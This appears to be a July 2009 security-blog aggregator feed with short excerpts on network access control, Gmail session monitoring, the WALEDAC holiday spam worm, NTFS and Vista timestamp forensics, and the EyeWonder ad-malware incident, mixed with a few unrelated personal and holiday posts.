There's an interesting post on VitalSecurity.org by paperghost. He's talking about a feature in Gmail that allows you to see all IP Addresses logged into your Gmail account and even sign out all other users. He has two interesting thoughts in the article. That there's now a privacy concern if an attacker is in your [...]

Some People Really Need to Look Into NAC

Sun, 05 Jul 2009 00:59:05 +0100

Over the weekend I was talking to someone who has a mandatory requirement at work to have their computer inspected by the helpdesk every 60 days. If the computer is not inspected the computer is not allowed onto the network.

I've heard of such requirements for remote users. Remote users who don't connect to the company using a VPN are tough to check up on. Requiring a periodic check-in could be a good idea for those users. However, physically checking computers that are manageable devices on your internal company network seems like a waste of time to me. If this story is accurate, I'd like to introduce them to NAC.

I know what you're saying. First they are using a form of NAC if they can keep unapproved people off the network, and force them to go to the helpdesk to reauthorize themselves every 90 days. Second, some people think of NAC like they think of PKI. It just hasn't taken off yet and some people think it is one of the more useless "useful technologies."

NAC is actually useful for quite a bit more than keeping people off the network. If you manually check computers every 60 days, a computer that has broken patching mechanisms or is infected will not be detected for an average of 30 days. NAC would be able to detect this as the computer is connected to the network and on an ongoing recheck schedule. Even if you don't want to send the user to a remediation page you could alert the helpdesk. Better to be fixing known problems immediately than inconveniencing everyone else every 60 days.

If you do have a NAC project, I'd suggest checking out Forescout. I have been happy with our selection. When we looked at other vendors it wasn't even close in my opinion. Don't feel like you have to buy NAC from your network switch vendor or your desktop antivirus vendor.

Journalising, Journalism and Blogging…Restrictions on Posting

Sat, 04 Jul 2009 23:31:13 +0100

I had a few comments sent to me about my last post. Some of the feedback; “It wasn’t inspirational”, “Its perspective wasn’t that unique”, “What was the point?” etc…. All fair points. My only response is that at times, I will use Beast or Buddha as my journal to write about things that aren’t necessarily [...]

Interview with CTO of Fortinet, Michael Xie

Sat, 04 Jul 2009 22:56:45 +0100

I was somewhat surprised by a position taken by Gartner at this past week’s Security Summit at the Gaylord in Washington DC. My surprise started with a blog post by Adam Hils and responses to my comments by Greg Young. From Gartner’s viewpoint which is admittedly from the perspective of late adapters, the “Next [...]

Female looking for females to bunk with

Sat, 04 Jul 2009 22:15:55 +0100

Unsure of days -- sort of depends on what I can find so far as lodging goes. So consider me flexible, there. Willing to crash on floors and pay my own way, just can't afford single occupancy these days. Would prefer to bunk with other females strictly, but if you have a dude (homo or hetero or...

4th of July - discount

Sat, 04 Jul 2009 20:36:34 +0100

Today, whilst contemplating the birthday of the USA, I recalled that today is also the 2nd anniversary of the first time I ever worked forensics in the US. For the 7 years before moving, I worked computer forensics for the Queensland Police Service in Australia, an agency with over 10,000 police officers and almost [...]

Understanding China’s cyber threat perception

Sat, 04 Jul 2009 20:16:00 +0100

Nations develop defense capabilities and weapon systems based on threat perception.� While it is� extremely difficult to predict future war, it is something each country must take seriously.� You don’t spend all of your military budget on coastal defense if estimates show it is more likely you will engage in land warfare.� If military decision-makers [...]

HakShop back online

Sat, 04 Jul 2009 15:29:55 +0100

After nearly a week of downtime the HakShop is back online. Hooray! On a personal note, I’m done playing with e-commerce packages for a while. Everything I’ve played with from ZenCart to Prestacart to Megento and ...

Happy July 4th To Our American Cousins

Sat, 04 Jul 2009 14:51:03 +0100

Sarah Palin resigned providing for an inadvertent early holiday present. Now, as she goes off in search of a speech writer (she REALLY needs one), we would like to wish a very happy July 4th to our American cousins from all of us at Liquidmatrix Security Digest (well, the Canadian part of the gang). Enjoy! Hmm. [...]

WALEDAC celebrates Independence Day, too

Sat, 04 Jul 2009 14:13:56 +0100

Holidays are almost always the target of significant spam and malware attacks, and this Fourth of July is turning out to be little different. A new WALEDAC variant – detected as WORM_WALEDAC.DU – has been sending out Independence Day spam messages. (In fact, last year there were multiple fourth of July attacks, one of which [...]

Post from: TrendLabs | Malware Blog - by Trend Micro

WALEDAC celebrates Independence Day, too

HAPPY INDEPENDENCE DAY

Sat, 04 Jul 2009 13:35:57 +0100

Just wanted to post a quick note to say “HAPPY BIRTHDAY AMERICA” and to say a BIG THANK YOU to all of you who have served America to ensure our freedom. Some of you served, or are serving, in the Armed Forces. Some have served in elected positions and some have served by giving [...]

The Case of the Missing MFT Entry

Sat, 04 Jul 2009 13:24:00 +0100

A bit ago, I received an email from someone mentioning the following facts with respect to an examination they were doing:

- Malware was suspected as having been running at one point on a Windows XP SP2 system
- A Prefetch file was found the related directly to the malware
- AV logs indicated that the malware had been deleted
- An XP Restore Point included an INI specific to the malware
- Between the time that the malware had been deleted and the system imaged, 8 Restore Points were created

Given these facts, the question was...why does there appear to be no MFT entry for the malware file?

I responded with my answer...I want to know what YOU think.

Vista Timestamps

Sat, 04 Jul 2009 10:39:00 +0100

Timestamps can certainly be tricky because of many factors that can affect its accuracy. This fact however doesn’t automatically mean that file timestamps cannot be relied upon as evidence. This usually means that more work needs to be done by a forensic examiner to:

Correlate events from different sources.
Identify the factors leading to the timestamps changes.

Correlating events from different sources.

Some time ago a came across of an article about ‘selective enhancement’ method used to reconstruct a digital photograph from digital video footage. This method takes advantage of the fact that different frames are slightly different because the object moved or the light source is changed. These differences are collected and then utilised in reconstructing the image. Now going back to digital forensics, correlating events involves the process of identifying alternative sources of evidence. Taken out of context, such evidence may be viewed as an irrelevant or insignificant detail in the presence of more weighty findings. Nevertheless, this kind of evidence may become crucial in reconstruction of events and is too important an area to neglect.

Identify the factors leading to the timestamps changes.

There are many factors that can affect timestamps including, but not limited to various scanning or indexing applications, changing the system clock, the clock skew or using anti-forensic tools. Unless the application responsible for altering time stamps has been resident in memory for a long time, such applications are identifiable based on its execution time.

The knowledge and experience plays a critical role in the process of verifying the accuracy of timestamps. There are many publications available on the Internet that discusses timestamps and Vista timestamps in particular. You can find a link to these publications in my old post. Yet, there are several recent ‘white papers’ on the Internet that just can’t get Vista timestamps right.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem
Value Name: NtfsDisableLastAccessUpdate
Data Type: REG_DWORD (DWORD Value)
Value Data: set 1 to prevent the Last Access time stamp updates.

This doesn’t indicate that no ‘Access Time’ would not be updated at all. By simply experimenting with a text file sitting on your (if you have Vista of course) desktop, you would be able to quickly determine that ‘Access Time’ value doesn’t change on accessing or modifying the file. It will only change when you copy the file or move it to another volume.

Va Pbaterff Nffrzoyrq, Whyl 4 1776

Sat, 04 Jul 2009 08:46:44 +0100

My usual celebration of Independence day is to post, in its entirety, the Declaration of Independence. It's very much worth reading, but this year, there's a little twist, from a delightful story starring Lawren Smithline and Robert Patterson, with a cameo by Thomas Jefferson. Patterson sent Jefferson a letter which read, in part:

“I shall conclude this paper with a specimen of such writing,” he boasted, “which I may safely defy the united ingenuity of the whole human race to decypher to the end of time….”

Well, perhaps it didn't last until the end of time, but the cipher apparently lasted until now, which is pretty darn good. There's an article in Harvard Magazine, and one in American Scientist, but it's behind a paywall. Finally, the Wall St Journal has an article, which mentions, both without linking to either.

I think what I really like about this story is how a mathematician bothered to send his new ciphertext to the author of Virginia's statue on religious liberty (as our third President preferred to be remembered). Having just finished Steven Johnson's very enjoyable "The Invention of Air," I'm struck by how broadly engaged with science and the useful arts the founders were. I think that sending an encrypted letter to President Obama would get you ... well, I don't really want to think about it, having just read the Declaration.

Independence Day

Sat, 04 Jul 2009 08:01:00 +0100

EC-Council Awarded More NSA CNSS Certifications

Sat, 04 Jul 2009 04:42:22 +0100

EC-Council Awarded More NSA CNSS Certifications

EC-Council Courseware for Certified Ethical Hacker (C|EH), Computer Hacking Forensics Investigator (C|HFI), Disaster Recovery Professional (E|DRP), Certified Security Analyst (E|CSA) and Licensed Penetration Tester (L|PT) Courseware has been certified at the highest national level by the Committee of National Security Systems (CNSS).

The CNSS is a federal government entity under the U.S. Department of Defense that provides procedures and guidance for the protection of national security systems. The NSA certified these programs as meeting the CNSS 4012, 4013A, 4014, 4015 and 4016 training standards for information security professionals in the federal government.

Website Kidnapping

Sat, 04 Jul 2009 04:30:14 +0100

Who says business people don't understand security? The former marketing firm for Steak 'n Shake has executed a DoS, the Varnson Group is holding Steak n Shake's website hostage in a payment dispute. The Varnson Group signed a $4.36 million, 26-month contract in mid-November, with just over half of that to be paid in Steak n Shake stock. Steak n Shake terminated the deal in early February. The lawsuit filed by Steak n Shake March 3 in Indianapolis doesn’t go...

EyeWonder malware incident affects popular web sites

Sat, 04 Jul 2009 01:09:29 +0100

During the last couple of hours, visitors of popular and high trafficked web sites such as CNN, BBC, Washington Post, Gamespot, WorldOfWarcraft, Mashable, Chow.com, ITpro.co.uk, AndroidCommunity; Engadget and Chip.de, started reporting that parts of the web sites are unreachable due to malware warnings appearing through the EyeWonder interactive digital advertising...

img200.jpg [Flickr]

Sat, 04 Jul 2009 01:05:28 +0100

brianjo posted a photo: